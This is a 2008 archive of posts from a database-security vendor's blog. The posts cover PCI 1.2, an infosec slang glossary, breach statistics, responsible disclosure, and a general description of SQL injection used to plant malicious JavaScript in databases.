Barry Shteiman: August 2008 Archives

I'm reading the news and it's like watching Mythbusters. On one hand, NASA managed to find "life" in space. On the other hand, my myth of NASA's security is busted. For the sake of discussion, it does not matter how the virus got there and whether or not it is dangerous or just annoying.  The simple fact is that there are no more sanctuaries.

I hate to sound like I'm FUD-ing - and I hope that no one will Defudder me - however, there are some questions that should be asked.

PCI version 1.2 is starting to make its rounds. Having been through 1.0, then 1.1, this new version continues to give me the warm and fuzzies about this regulation. Why? Because it's just so reasonable. I know people will take issue with that, but if you've been around regulations for awhile you know what I mean (does anyone remember HIPAA and all the cycles we went around on that? Or the SOX COBIT meat grinder?).

Amichai and I held a webinar last week. Recalling the rush around 1.1 as organizations tried to get their heads around the regulations, we decided to help folks get a head start. Our net take away is the old Hitchhiker's Guide to the Galaxy adage, "Don't Panic."

   

(\There's a New Talk in the Block\ figure of speech)

 

After watching Chicago Hope, ER and Grey's Anatomy I can now follow some of the medical lingo thrown here and there. With NYPD Blue, the various CSI's and Law & Orders, I got to know some police slang. From LA Law, The Practice, and Law & Order (2 for the price of 1!) I learned some lawyer talk. Even Buffy the Vampire Slayer enriched my gothic- vocab.

And now it's the security industry's time to put a list together before we find ourselves ashamedly bewildered couch potatoes. While not as comprehensive as Douglas Adams' (and John Lloyd) "Meaning of Liff", here are some terms I gathered for those very common infosec concepts that we all need names for: 

• Malvertisements: malicious ads that, once clicked, route the user to some malware site. Drive-by-downloads thrive on malvertisements.
• Freetards: mainly used to describe those that click on malvertisements promoting free proprietary software, free movies, and free songs. Remember, you get what you pay for (or perhaps, you pay for what you get for free).
• Hacktivism: Hacking with a political / social agenda. Hacktivists usually target popular websites in order to deface them with their message. A popular defacement method is SQL Injection.
• Great Firewall of China: China's strict policy of IP and content filtering. Hactivists usually try and find a way to bypass the Great Firewall of China.
• Hacker- ogler: one that hacks into a Webcam.

And may I add one of my own:

• Defudder: The act of bloggers and forum members to refute the FUD (Fear, Uncertainty, Doubt) vendors try to feed the non-technical user.

Let's practice some geek talk now: "Don't be a freetard and click that link! It's probably maltvertisement planted there by a hacktivist who couldn't get past the great firewall of China"

Feel free to post your dictionary additions in the comments sections!

So, in an attempt to overcome coffee deprivation, I am trying to read some trade rags.  Here's what I dug up similar to what my colleague, Sharon, posted recently: "This Year's Data Breaches Surpass 2007 Totals".  We are now "ahead" of 2007 numbers now.  So, sort of like the opposite of "tax freedom day," we are now moving the date back for how quickly we hit last year's numbers.  Despite that, I take that as a good sign as I expect that while the number of breaches is increasing, people are becoming more aware and are starting to report it as well (voluntarily or involuntarily).  There is definitely light at the end of the tunnel, and, no, it is not that of an oncoming train :-)

In the world of media, ratings are everything. It is the industry's lifeblood. Check the US TV buzz pulse here. Success and failure are determined by the ratings value: daily and weekly statistics, all based on statistical sampling.

When it comes to security and auditing, sampling is simply not good enough. The leaders at Fuji Television Network, Japan's leading television broadcasting company (they also broadcast Dragon Ball Z, ask your kids...)  know that. One of the key reasons to select SecureSphere according to said Mr. Satoshi Morimoto, Manager of Information Security for Fuji Television Network was that "SecureSphere provides us with full details on database queries and responses"

Image source: http://www.oliverdunne.com/alldone/comics/4%20-%20No%20Coffee.png

My all time Donald Rumsfeld favorite:

There are known knowns. There are things we know that we know. There are known unknowns. That is to say, there are things that we now know we don't know. But there are also unknown unknowns. There are things we do not know we don't know.

Ask anyone that used a software for long enough and he'll tell you that error messages
should provide helpful information and advice, not only for the user, but also for tech support and maintenance programmers. The web is full with examples of useless and stupid error messages like those in this classic article from 1998.
No doubt that errors messages should be useful, but in most cases, it's far better than no messages at all. I've seen individual developers and even companies taking the shortest path to "solve" the problem of problem by taking the totally DTTC wrong approach (Don't Tell The Customer), thinking that they can swipe a temporary or minor event's problem under the rug but then creating a bigger problem of unknown unknowns.

In a rather unusual email, Google's Android security team approached the security community earlier this week via the full disclosure mailing list introducing themselves, asking for moral support and responsible disclosure. Amichai and I talked recently about responsible disclosure (here, here and here) The Android security team at Google took no chances, promising credit only to those that will play by their rules.

Our vulnerability bulletins will credit responsible reporters of any  flaws.

If you did not had a chance to read Google's mail, you should. It's fun reading, here are my comments...

Do you have the next great web idea but lack technical staff? Do you have technical skills and are looking for the next big thing to drive your excitement and enthusiasm? There are several sites that will try to connect entrepreneurs with highly skilled professionals but JustHackIt is the first site that is dedicated to web applications.

So the idea is to connect people who want to build something RIGHT NOW. Ideas can be simple 1 page websites or complex Google competitors. The main point is to just get started hacking with new people! Hopefully you'll meet your next co-founder or your 1 page website will be successful by itself. If you find out you don't work well with someone, try someone else. No pressure.
 

Simple idea, nicely executed. Some of the ideas are good. From an ROI perspective, it looks like a good $7 investment. According to Centernetworks, the site is now for sale. The use of the hack-words, with all possible diversions and inflections makes sense as well as a buzz generation tool. If nothing works, it can always continue to be used as the hackers dating site. 

As a follow up to our ADC webinar on SQL Injection led by our CTO - Amichai Shulman, I had an opportunity to meet with some of our customers and discuss the latest SQL attack trends.

Our partner, AppSec Consulting, chose the location, which I admit was not to my liking. They choose an indoor gun range and while for some people, shooting stuff is the ultimate stress reliever, I'm not one of them. As a veteran Lieutenant of the Israeli Defense Force, shooting brings up some stressful memories. If you have never experienced shooting in an indoor range, let me tell you - it's scary. The sound produced by gunfire is deafening outdoors, but when the acoustical energy it produces is confined to a small indoor space as in a firing range, it gets even louder. Add to that the fact that some shooters are new to the experience, and some (not our customers) may be doing stupid, crazy things... oh, well. I stayed outside while the guys were having fun.

But as I mentioned, we spent some time talking about SQL Injection attacks as well. Often when we talk about SQL Injection attacks, we think about protecting the application with a web application firewall. Less often, we talk about the impact on the database behind the website. In the past, when most of the SQL Injection attacks tried to get valuable information out of the database, and in that case we didn't compromise or change anything on the RDBMS itself. But lately we see more attacks that try to manipulate the content of the RDBMS. The example I used at my demo showed how you can use SQL Injection to insert into the database a command to run  JavaScript. The compromised database can have a piece of JavaScript (JS) embedded in it, which in turn points to another JS file on a separate domain. Any web page which is now built based on a compromised database may result in running these scripts, downloading malicious code and silently distributing malware through the connected system.

A compromised database entry:

     

The bottom line is that databases are a critical component of any web application and when protecting the application you can not ignore the database itself. Databases should be scanned and monitored continuously to prevent compromised content.

I hope our next event takes place at a less stressful location - perhaps even an outdoor gun range. How about paintball? I heard that's a lot of fun.